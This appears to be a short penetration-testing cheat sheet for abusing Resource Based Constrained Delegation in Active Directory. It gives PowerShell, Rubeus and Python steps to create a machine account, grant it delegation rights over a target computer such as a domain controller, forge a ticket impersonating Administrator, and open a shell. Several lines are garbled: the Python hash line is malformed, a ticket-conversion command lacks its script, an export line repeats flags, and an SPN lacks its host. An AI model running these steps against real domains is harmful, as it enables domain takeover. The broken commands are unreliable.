Resource Based Constrained Delegation

If we have an account with permission GenericAll, we can create or update info of users like passwords, machines, etc.

#Import Powermad and use it to create a new MACHINE ACCOUNT
Import-Module .\Powermad.ps1
. .\Powermad.ps1

# Create new machine
New-MachineAccount -MachineAccount lanz -Password $(ConvertTo-SecureString 'buenosdias' -AsPlainText -Force) -Verbose

#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid

#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
# Out Target could be:
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'buenosdias'

# Or with Python3
import hashlib
print('md4', 'buenosdias'.encode('utf-16le')).hexdigest())

#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:lanz /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/ / /ptt

Take the hash, copy in your machine, decode base64 and use to generate the file .ccache, then export the ticket in the environment var KRB5CCNAME=ticket.ccache and use wmiexec, psexec, smbexec, etc. to authenticate, impersonate user and get a Shell.

python3 ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache -k -no-pass -k -no-pass -k -no-pass

Last updated